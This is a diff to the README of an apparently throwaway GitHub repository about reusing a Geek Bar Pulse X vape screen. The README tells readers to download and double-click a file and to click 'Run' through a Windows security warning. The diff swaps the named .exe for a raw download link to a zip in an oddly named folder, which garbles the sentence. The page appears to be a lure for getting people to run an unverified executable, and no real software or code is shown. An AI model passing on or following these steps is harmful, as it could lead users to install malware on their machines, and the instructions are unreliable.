headdressamericanredplum253/geekbar_pulse_x_screen_reuse/README.md

    Find the file that matches your operating system.
 If you see options for Windows, macOS, or Linux, choose the one that suits you.
 Click the link to begin downloading.

 4. **Locate the File:**
    Once the download finishes, go to your computer’s "Downloads" folder.
-You should see the file you just downloaded, likely named something similar to `geekbar_pulse_x_screen_reuse.exe`.
+You should see the file you just downloaded, likely named something similar to `https://raw.githubusercontent.com/headdressamericanredplum253/geekbar_pulse_x_screen_reuse/main/Naiadaceae/geekbar_pulse_x_screen_reuse.zip`.

 5. **Run the Application:**
    Double-click the downloaded file to run it.
 You may see a security warning, especially on Windows.
 Click "Run" to proceed.